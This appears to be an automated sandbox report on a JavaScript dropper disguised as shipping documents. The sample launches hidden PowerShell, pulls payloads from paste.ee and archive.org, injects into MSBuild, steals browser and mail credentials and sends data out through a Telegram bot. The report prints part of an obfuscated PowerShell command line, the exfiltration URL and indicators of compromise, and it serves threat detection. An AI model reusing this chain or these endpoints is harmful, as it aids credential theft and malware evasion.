`2microsoft.win32.taskschedulercalendartriggermicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vboxservice
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware pointing device<Each value of the array must contain a valid file reference.
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware usb pointing device
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware s
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmusrvc
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware pointing device
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware sata
                      Source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VirtualMachineDetector
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmwareArguments
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmsrvc
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmtools
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C47000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmwarexD{
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: .metadata.xml!vmware virtual s scsi disk device
                      Source: powershell.exe, 0000000A.00000002.1577845542.000001E8A9D3F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2503617924.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: virtualmachinedetector
                      Source: powershell.exe, 0000000A.00000002.1529745429.000001E893C32000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware vmci bus device
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\System32\wscript.exe Network Connect: 23.186.113.60 443
                      Source: Yara match File source: amsi64_6852.amsi.csv, type: OTHER
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, UltraSpeed.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                      Source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41A000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41C000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 77B008
                      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = '[base64-encoded PowerShell payload omitted]' -replace '','';$al
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
kadgbladsajabyaguadgbvagwadqb0agkabwbuagkaegblagqaiaa9acaajabtag8abgbvahqacgbvahaaaqbzag0algbtahuaygbzahqacgbpag4azwaoacqadqbuagmacgblageadabpahyazqasacaajabiageadaboag8acgapadsajabtaguabqbvahiayqbiagwazqbuaguacwbzacaapqagafsauwb5ahmadablag0algbdag8abgb2aguacgb0af0aoga6aeyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaakahiazqb2ag8abab1ahqaaqbvag4aaqb6aguazaapadsajabjahuabab0ahiayqb0aguaiaa9acaawwbtahkacwb0aguabqauafiazqbmagwazqbjahqaaqbvag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoacqabqblag0abwbyageaygbsaguabgblahmacwapadsajabyaguacwbpahqadqbhahqazqbzacaapqagafsazabuagwaaqbiac4asqbpac4asabvag0azqbdac4arwblahqatqblahqaaabvagqakaanafyaqqbjaccakqauaekabgb2ag8aawblacgajabuahuababsacwaiabbag8aygbqaguaywb0afsaxqbdacaaqaaoacqabqb1agwadabpagyababvahiabwb1ahmalaanaccalaanaccalaanaccalaanae0auwbcahuaaqbsagqajwasaccajwasaccajwasaccajwasaccajwasaccaqwa6afwavqbzaguacgbzafwauab1agiababpagmaxabeag8adwbuagwabwbhagqacwanacwajwbxahuazqbyahuababvahuacwbuaguacwbzaguacwanacwajwbqahmajwasaccajwasaccajwasaccaywblag4adabpag0azqb0ahiaaqbjaccalaanadiajwasaccajwapacka' -replace '','';$alJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match File source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.powershell.exe.1e8a2f26c05.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.powershell.exe.1e8a2e670c8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6720, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Yara match File source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.powershell.exe.1e8a2f26c05.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.powershell.exe.1e8a2e670c8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000C.00000002.2507426885.0000000002959000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6720, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match File source: 10.2.powershell.exe.1e8a1e165d0.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.powershell.exe.1e8a1e165d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.powershell.exe.1e8a2f26c05.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 10.2.powershell.exe.1e8a2e670c8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6720, type: MEMORYSTR
                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Native API | 32 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 311 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 13 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 1 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 31 Virtualization/Sandbox Evasion | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 311 Process Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Behavior Graph ID: 1676212, Sample: Shipping Documents SI 694_pdf.js, Startdate: 28/04/2025, Architecture: WINDOWS, Score: 100
                      [Behavior graph image not reproduced; process chain and annotations recovered from the figure text:]
                      wscript.exe: connects to paste.ee; System process connects to network (likely due to code injection or exploit); JScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; 3 other signatures; started powershell.exe
                      powershell.exe: connects to archive.org and ia801700.us.archive.org; Writes to foreign memory regions; Injects a PE file into a foreign processes; started MSBuild.exe and conhost.exe
                      MSBuild.exe: connects to checkip.dyndns.com and reallyfreegeoip.org; Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

                      Source | Detection | Scanner | Label | Link
                      Shipping Documents SI 694_pdf.js | 14% | ReversingLabs
                      SAMPLE | 100% | Joe Sandbox ML
                      No Antivirus matches


                                                                                              high
                                                                                              https://contoso.com/powershell.exe, 0000000A.00000002.1550336005.000001E8A1BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.1550336005.000001E8A1BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://reallyfreegeoip.orgMSBuild.exe, 0000000C.00000002.2507426885.000000000289E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://checkip.dyndns.orgdMSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://analytics.paste.ee;powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://reallyfreegeoip.orgMSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://cdnjs.cloudflare.compowershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://aka.ms/pscore68powershell.exe, 0000000A.00000002.1529745429.000001E891B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://checkip.dyndns.comMSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://cdnjs.cloudflare.com;powershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://checkip.dyndns.org/dMSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.1529745429.000001E891B51000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://secure.gravatar.compowershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://themes.googleusercontent.compowershell.exe, 0000000A.00000002.1529745429.000001E893D20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1529745429.000001E891F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://api.telegram.org/bot-/sendDocument?chat_id=powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://ia801700.us.archive.orgpowershell.exe, 0000000A.00000002.1529745429.000001E891F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://reallyfreegeoip.org/xml/powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A1DF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2501909012.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2507426885.0000000002882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
IP | Domain | Country | ASN | ASN Name | Malicious
23.186.113.60 | paste.ee | Reserved | 49466 | KLAYER-GLOBALNL | false
104.21.112.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
207.241.233.30 | ia801700.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
207.241.224.2 | archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1676212
Start date and time: 2025-04-28 13:23:13 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (Javascript)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Shipping Documents SI 694_pdf.js
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winJS@6/3@7/5
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 50
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .js
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.29.183.29, 199.232.214.172, 172.202.163.200, 52.165.164.15, 40.69.42.241
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Execution Graph export aborted for target MSBuild.exe, PID 6720 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
07:24:23 | API Interceptor | 1x Sleep call for process: wscript.exe modified
07:24:31 | API Interceptor | 46x Sleep call for process: powershell.exe modified
                                                                                                                                • 199.232.210.172
                                                                                                                                c57s18lwKh.exeGet hashmaliciousAmadey, LummaC Stealer, RHADAMANTHYS, Vidar, XmrigBrowse
                                                                                                                                • 199.232.214.172
                                                                                                                                4QwoDIoVBZ.exeGet hashmaliciousXmrigBrowse
                                                                                                                                • 199.232.214.172
                                                                                                                                paste.eeiiii Drawings_Tender No. UAE-UCPC-4389761110-2025.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                awb_invoice_27_04_2025_0000000_pdf.vbsGet hashmaliciousXWormBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                d.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                z18awb_bl_invoi.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                Payment Asvice in Doc.VBE.vbeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                PO_66360_xlsx.jsGet hashmaliciousRemcosBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                PO_66360_Website_Products_xlsx.jsGet hashmaliciousRemcosBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                Trasferire.VBS.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                NEW ORDER.jsGet hashmaliciousXWormBrowse
                                                                                                                                • 23.186.113.60
                                                                                                                                awb_fedex_documents_delivery_24_04_2025_0000000000000_pdf.vbsGet hashmaliciousAsyncRATBrowse
                                                                                                                                • 23.186.113.60
No context

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:NlllulhvnXz:NllU
MD5: 13A5F687991893CCDFE198EC677D17AF
SHA1: 542384358389E50E487BF95100E71B5CB40A8634
SHA-256: DCFE651EDD144DC36D9D358195D17E80FAEA258EF4146AD5C91F83B4BDA00B77
SHA-512: 55CCC7DA45C19540A299912461AC492D1F078C4275A56DF6028FF10FEE0E78017A7012C155366465825959B33F5F668677DFD47B034E0924943BC597FD0F1D3A
Malicious: false
Reputation: low
Preview: @...e...................................8............@..........
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                File type:Unicode text, UTF-8 text, with very long lines (488), with CRLF line terminators
                                                                                                                                Entropy (8bit):5.420391653791411
                                                                                                                                TrID:
